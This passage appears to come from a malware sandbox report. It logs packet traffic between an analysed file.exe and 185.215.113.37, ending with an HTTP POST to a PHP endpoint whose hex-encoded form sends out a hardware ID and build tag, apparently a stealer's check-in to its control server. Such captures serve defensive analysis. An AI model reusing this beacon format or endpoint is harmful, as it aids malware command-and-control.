Oct 3, 2024 18:38:24.592786074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592804909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592824936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592839003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592859030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592870951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592886925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592905998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592937946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592957020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592968941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592972040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592994928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593004942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593025923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593039036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593051910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593071938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593086958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593106985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593122005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593139887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593159914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593173027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593189001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593206882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593219042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593240976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593254089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593276024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593288898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593313932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593327999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593347073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593363047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593379974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593393087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593430996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593719006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593767881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593769073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593801975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593817949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593835115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593849897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593868017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593883038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593904018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593915939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593936920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593950033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.593971014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.593986034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594001055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594027042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594033957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594046116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594068050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594080925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594100952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594116926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594135046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594146013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594166994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594181061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594202042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594213963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594234943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594249010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594268084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594280958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594301939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594316006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594335079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594353914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594369888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594388008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594403982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594455957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594651937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594686031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594706059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594721079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594737053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594754934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594769955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594786882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594804049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594820976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594854116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594870090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594886065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594897985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594922066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594954967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.594971895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.594986916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595001936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595020056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595033884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595052958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595065117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595098972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595185041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595217943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595264912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595268965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595302105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595315933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595335007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595360041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595367908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595376015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595410109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595422983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595457077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595472097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595490932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595513105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595525026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595537901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595557928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595591068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595608950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595623016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595638990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595655918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595669985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595690012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595698118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595724106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595736027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595757008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595765114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595793962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595801115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595827103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595839977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595861912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595874071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595906019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595915079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595947981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595963955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.595982075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.595993996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.596014977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.596028090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.596048117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.596069098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.596084118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.596112013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.596128941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.596146107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.596174002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.632379055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.638437986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.857841015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.857901096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.857934952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.857968092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858002901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858035088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858050108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858050108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858050108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858087063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858088017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858098984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858122110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858140945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858155966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858172894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858189106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858223915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858239889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858269930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858272076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858303070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858335018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858369112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858388901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858405113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858422995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858433962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858457088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858483076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858485937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858536959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858572006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858587027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858623028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858623981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858658075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858691931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858726025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858746052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858777046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858778000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858829021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858861923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858913898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.858913898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858947992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858980894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.858997107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859015942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859056950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859064102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859088898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859122992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859142065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859157085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859189034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859206915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859347105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859380007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859410048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859432936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859467030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859488964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859498978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859530926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859553099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859565020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859597921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859621048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859631062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859649897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859666109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859700918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859719992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859734058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859756947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859770060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859812975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859828949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859848022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859863043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.859880924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859936953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859971046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.859988928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860004902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860021114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860038996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860054970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860071898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860088110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860106945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860152960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860529900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860553980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860569954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860584974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860599995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860604048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860615969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860624075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860634089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860649109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860649109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860666037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860676050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860682964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860696077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860699892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860714912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860721111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860730886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860740900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860749006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860754967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860766888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.860779047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.860807896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:25.440987110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:25.441035032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:25.447807074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:25.448045015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.163193941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.163273096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.236006021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.241688013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.460221052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.460246086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.460261106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.460320950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.460369110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.463699102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.468638897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.692646980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:26.692712069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.710481882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:26.715492964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.432760954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.432864904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.467138052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.472238064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.720875978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.720968008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.720982075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:27.721000910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.721044064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.721044064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.722686052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:27.727606058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:28.440362930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:28.440435886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:32.365605116 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7336	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 18:38:09.435070038 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 18:38:10.233720064 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:10.237787008 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 31 42 35 39 42 45 43 38 31 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data 